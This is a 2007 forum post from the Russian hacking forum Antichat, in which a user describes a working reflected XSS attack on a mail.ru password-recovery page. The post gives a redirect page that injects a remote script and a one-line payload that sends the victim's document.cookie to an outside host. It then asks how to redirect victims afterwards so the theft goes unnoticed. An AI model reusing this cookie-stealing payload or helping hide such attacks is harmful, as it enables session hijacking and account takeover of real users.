Форум АНТИЧАТ - Как сделать редирект. Или что еще можно придумать?

Как сделать редирект. Или что еще можно придумать?

13.08.2007, 01:22

Alloc

Новичок

Регистрация: 12.08.2007

Сообщений: 5

Провел на форуме:
32789

Репутация: 0

Как сделать редирект. Или что еще можно придумать?

Доброго всем времени суток!
Помогите пожалуйста разобраться... Я много читал статей, постов на этом форуме про XSS уязвимости и решил попробовать... вроде как все получается... Я создал страничку на народ.ру (index.html) со следующим содержимым:

Код:

<script>
document.location.href="http://content.mail.ru/cgi-bin/forgot.cgi?&email=<script src=http://MySite.narod.ru/js.js>";
</script>

// Кстати уязвимость уже закрыта... но дело не в этом

А в скрипте (Js.js) я пишу следущее:

Код:

img=new Image();img.src="http://www.s.netsec.ru/alloc.gif?"+document.cookie;

Все работает... НО!
При нажатии на ядовитую ссылку, естественно открывается та страничка где есть уязвимость... тоесть:

Код:

http://content.mail.ru/cgi-bin/forgot.cgi?&email=

И у меня такой вопрос...: Как сделать так чтоб кукисы варовались и после чего шел какойнибудь редирект например на другой сайт... чтоб пользователь не видел той странички на которой XSS? Просто так все очень паленна... Возможно такое? И как это осуществить? Надеюсь на вашу помощь уважаемые Хакеры!